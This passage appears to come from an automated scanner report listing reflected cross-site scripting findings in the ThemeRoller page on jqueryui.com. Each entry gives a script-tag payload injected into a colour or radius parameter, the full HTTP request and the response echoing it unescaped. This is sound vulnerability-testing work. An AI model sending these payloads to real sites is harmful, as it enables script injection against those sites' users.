ng&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.28. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74af0"><script>alert(1)</script>33f2ea18869 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorE
...[SNIP]...

1.29. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c1"><script>alert(1)</script>9623c246bab was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadad
...[SNIP]...

1.30. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31115"><script>alert(1)</script>bb5473053cb was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTexture
...[SNIP]...

1.31. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2637"><script>alert(1)</script>983080c5ba4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.32. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7baa"><script>alert(1)</script>666b39dfef6 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6
...[SNIP]...

1.33. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db7f"><script>alert(1)</script>664d66bb6b3 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTe
...[SNIP]...

1.34. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aebba"><script>alert(1)</script>f95f6ef0ad9 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Default=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTe
...[SNIP]...

1.35. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e303"><script>alert(1)</script>b0e9e9ddf01 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImg
...[SNIP]...

1.36. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e89a"><script>alert(1)</script>6b39fffa270 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270" type="text/css" media="all" />
...[SNIP]...

1.37. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
